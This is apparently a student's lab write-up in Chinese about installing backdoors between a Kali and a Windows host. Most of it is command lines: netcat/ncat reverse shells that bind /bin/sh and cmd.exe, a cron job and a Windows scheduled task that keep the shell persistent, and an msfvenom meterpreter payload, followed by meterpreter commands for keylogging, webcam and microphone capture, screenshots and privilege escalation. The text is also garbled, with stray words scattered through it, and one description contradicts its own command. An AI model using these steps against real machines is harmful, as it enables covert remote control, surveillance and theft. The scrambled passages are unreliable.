在windows下,打開CMD,使用ipconfig
指令查看本機IP
linux
而後使用ncat.exe程序,ncat.exe -l -p 5220
監聽本機的5220端口web
在kali端,使用nc指令的-e選項,nc 192.168.1.101(主機ip) 5220(所設置的端口) -e /bin/sh
反向鏈接Windows主機的5220端口:
shell
隨後在windows端,就可使用kali的命令行了
vim
ifconfig
查看IP使用nc指令,nc -l -p 5220
,監聽5220端口windows
而後,在windows,輸入ncat.exe -e cmd.exe 192.168.150.135 5220
tcp
而後,在kali端,就可使用windows的cmd了
工具
先在Windows系統下,用ncat.exe -l -p 5220
,監聽5220端口測試
用crontab -e
指令編輯一條定時任務(輸入3,選vim.basic)ui
在最後一行加入59 * * * * /bin/netcat 192.168.1.101 5220 -e /bin/sh
,意思是在每一個小時的第30分鐘(爲測試結果方便所選時間最好離現實時間較近)反向鏈接Windows主機的5220端口,就會啓動cron
命令行
到時間後,便得到了Kali的shell,能夠輸入指令
在Windows系統下,打開控制面板->管理工具->任務計劃程序(可在控制面板直接搜索任務計劃),建立任務,填寫任務名稱後,新建一個觸發器:
下載安裝socat軟件
在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5220 exec:cmd.exe,pty,stderr
,這個命令的做用是把cmd.exe綁定到端口5220,同時把cmd.exe的stderr重定向到stdout上;
建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行,或者能夠右鍵單擊,而後選擇運行也能夠
socat - tcp:192.168.1.101:5220
,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5220端口,此時能夠發現已經成功得到了一個cmd shell輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.135 LPORT=5220 -f exe > 20155220.exe
生成後門程序(LHOST=kali linux的IP)
而後經過nc
指令將生成的後門程序傳送到Windows主機上
windows:ncat.exe -l 5220 > 20155220.exe
kali:nc 192.168.1.101 5220 < 20155220.exe
在Kali上使用msfconsole
指令進入msf控制檯,set payload windows/meterpreter/reverse_tcp
,使用監聽模塊,設置payload,設置反彈回連的IP和端口
設置完成後,利用exploit
,執行監聽,在windows中,利用20155220.exe
運行20155220.exe
此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell
record_mic
指令能夠截獲一段音頻使用webcam_snap
指令可使用攝像頭進行拍照
webcam stream
指令可使用攝像頭進行錄像screenshot
指令能夠進行截屏keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄先使用getuid
指令查看當前用戶,使用getsystem
指令進行提權,如圖所示,提權成功
1.例舉你能想到的一個後門進入到你係統中的可能方式?
2.例舉你知道的後門如何啓動起來(win及linux)的方式?
3.Meterpreter有哪些給你映像深入的功能?
4.如何發現本身有系統有沒有被安裝後門?